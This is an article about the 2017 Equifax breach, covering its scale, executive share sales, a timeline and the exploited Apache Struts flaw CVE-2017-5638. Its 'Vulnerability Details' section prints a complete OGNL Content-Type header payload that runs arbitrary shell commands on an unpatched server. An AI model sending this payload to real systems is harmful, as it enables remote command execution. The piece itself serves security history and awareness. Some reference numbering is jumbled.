Equifax Breach (2017)

6 August 2021 - Articles
Back

In 2017 Equifax were breached, the breach was discovered on July 29[5] and an announcement was published on Sept 7.[5] It wasn’t the largest breach of all time, and not even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (34.58%)

In regards to large breaches, in the same year Yahoo “upgraded” their previous August 2013 breach to note that it now believed to have affected all 3 billion accounts held on their systems. This figure was up from the original reported 1 billion affected accounts.[1][2][3] Yahoo noted that the stolen user information may have included names, email addresses, telephone numbers, dates of birth, MD5 hashes of passwords and in some cases encrypted or unencrypted security questions and answers.[3]

Additionally River City Media suffered a security incident that saw 1.37 billion email/postal addresses leaked. River City Media clarified that full name, IP address and email address was included for every record whilst physical (postal) address was included for “some” accounts.[4]

These breaches dwarf the “approximately 143 million” U.S. consumers affected which was the initial estimation, later increased to 145.5 million U.S. consumers” affected.[10] This increase additionally included 694,000 UK[21] citizens and 8,000 Canadian citizens.[9]

Initially the attack seemed to have taken place from mid-May and involved names, social security numbers, dates of birth, addresses and in some cases credit card numbers and driving license numbers.[6] However there was an earlier breach in March which Bloomberg reports was performed by the same intruders,[7] although Equifax released a statement denying the events were related:[8]

“The March event reported by Bloomberg is not related to the criminal hacking that was discovered on 29 July. Mandiant has investigated both events and found no evidence that these two separate events or the attackers were related.”

The latter breach was due to an Apache Struts vulnerability now known as CVE-2017-5638 which was publicly announced on 2017-03-06 along with a fix, an exploit was released as early as 2017-03-07[18] although Equifax did not patch the issue until 2017-07-30.[11] Putting the time to patch at 146 days.

The breach was detected on July 29th and days later four top managers sold some of their shares in Equifax. The Chief Financial Officer sold 13% of their holdings a $946,374. The President of US Information Solutions sold 9% of their holdings at $584,099. The President of Workforce Solutions sold 4% of their holdings at $250,458. Additionally a Senior VP of Investor Relations also sold shares.[13]

A special committee set up by Equifax’s board conducted an investigation. That investigation held 62 interviews and reviewed 55,000 documents, which included emails, text messages and phone logs and determined the four had no knowledge of the breach and this was not considered insider trader. Additionally they had all gained pre-clearance to sell the stock.[14]

However the US Justice Department are reportedly investigating the share sales[16] and the Federal Trade Commission is investigating the breach.[17]
Oh, and the CEO blamed an individual person for causing the data breach by failing to communicate the requirement to apply the patch.[15][20] However the CEO retired following the breach. He received a payout of $90,000,000. The Chief Information Officer and Chief Security Officer also both retired following the breach.

On a funny angle, during the period following the announcement of the breach, Equifax official twitter accounts accidentally (and repeatedly) misdirected users to a phishing site instead of their own information site. They intended to send them to equifaxsecurity2017.com but instead sent them to a fake site hosted by a security researcher at securityequifax2017.com.[19][23]

Finally, following their second breach the Equifax Credit Assistance site was found to be serving malicious software posing as a Adobe Flash update. They reportedly corrected this issue on October 12.[22]

Following the breach Equifax CEO, Richard Smith, testified in front of a US House subcommittee on consumer protection and detailed some of the challenges they faced following the breach – such as the fact that Hurricane Irma took down two of their larger call centres after the breach was announced.[26]

Timeline

Feb 14Apache is notified of the Struts vulnerability
Mar 6Apache releases a fix for the vulnerability
Mar 7An exploit is made available through Exploit-DB
May 14The day the breach occurred according to an Equifax statement
Jul 29Equifax detects the breach
Jul 30The exploited system is patched
Aug 1CFO and President of U.S. Information Solutions sells shares.
Aug 2President of Workforce Solutions sells shares
Sep 7Equifax announces the breach
Sep 8Equifax is critisized for the TrustID forcing users to waive their right to a class action lawsuit and New York Attorney General Eric Schneiderman demands the removal of the language. Equifax share price is down 13.7% since Sep 7.
Sep 9Equifax twitter account accidentally and repeatedly directs users to phishing site
Sep 15Equifax shares are down 34.58% following the breach announcement CSO and CIO announce retirement “effective immediately”
Sep 26CEO announces retirement, and takes a $90,000,000 payout.
Oct 2Equifax raises the number of affected US to 145.5 million and adds 8000 Canadians
Oct 3Equifax CEO blames a single individual for the breach
Oct 10Equifax announces 15.2m UK records compromised, of which 14.5 contain names and dates of birth, but 693,665 contain sensitive information.
Oct 12Equifax announces it has removed malicious software from its Credit Assistance site.
Nov 3Equifax announces it found no wrong doings in the four executives share trades.
March 2018(Former) Equifax employee pleads guilty to insider trading.[25]
July 2018A separate (Former) Equifax executive charged with insider trading.[26]

Vulnerability Details

The vulnerability exploited was CVE-2017-5638 which is an arbitrary command execution vulnerability within Apache Struts. Several exploits have been written with an initial proof-of-concept being released within 24 hours of the patch release day.

The vulnerability works by specifying a crafted Content-Type, Content-Disposition, or Content-Length HTTP header within a HTTP request. The headers can be crafted to include an OGNL expression which can cause arbitrary command execution. Such as:

Content-Type: %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’CMD HERE’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Read More

References

  1. https://www.theverge.com/2017/10/3/16414306/yahoo-security-data-breach-3-billion-verizon
  2. https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
  3. https://help.yahoo.com/kb/account/SLN28451.html?impressions=true
  4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
  5. https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628
  6. https://www.usatoday.com/story/money/2017/09/08/equifax-shares-tumble-after-data-hack-announcement/645146001/
  7. https://www.bloomberg.com/news/articles/2017-09-18/equifax-is-said-to-suffer-a-hack-earlier-than-the-date-disclosed
  8. https://www.theguardian.com/technology/2017/sep/19/equifax-credit-firm-march-breach-massive-may-hack-customers4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
  9. http://www.bbc.co.uk/news/business-41575188
  10. https://www.equifaxsecurity2017.com/frequently-asked-questions/
  11. https://securestrategy.co.nz/2017/10/01/what-equifax-did-wrong/
  12. https://arstechnica.co.uk/information-technology/2017/09/equifax-hack-started-4-months-before-it-was-detected/?comments=1&post=34027857
  13. https://www.theregister.co.uk/2017/11/03/equifax_share_trade_investigation/
  14. https://uk.reuters.com/article/uk-equifax-cyber/equifax-clears-executives-who-sold-shares-after-hack-idUKKBN1D31GV
  15. https://www.theverge.com/2017/10/3/16410806/equifax-ceo-blame-breach-patch-congress-testimony
  16. http://uk.businessinsider.com/equifax-hack-justice-department-investigation-of-alleged-insider-trading-2017-9
  17. https://www.theverge.com/2017/9/14/16306872/equifax-breach-ftc-probe-lawsuit-vulnerability
  18. https://www.exploit-db.com/exploits/41570/
  19. http://www.securityweek.com/equifax-sent-breach-victims-fake-website
  20. http://money.cnn.com/2017/09/18/technology/business/equifax-breach-march-earlier/index.html
  21. https://www.equifax.co.uk/about-equifax/press-releases/en_gb/-/blogs/equifax-ltd-uk-update-regarding-the-ongoing-investigation-into-us-cyber-security-incident
  22. https://krebsonsecurity.com/2017/10/equifax-credit-assistance-site-served-spyware/
  23. https://twitter.com/AskEquifax/status/906237250438131716
  24. https://www.theguardian.com/business/2018/mar/14/equifax-insider-trading-data-breach-jun-ying-charged
  25. https://www.reuters.com/article/us-equifax-cyber-insidertrading/former-equifax-employee-pleads-guilty-to-insider-trading-idUSKBN1KD2E7
  26. https://www.theregister.co.uk/2017/10/04/sole_security_worker_at_fault_for_equifax_fail_says_former_ceo/
Play Cover Track Title
Track Authors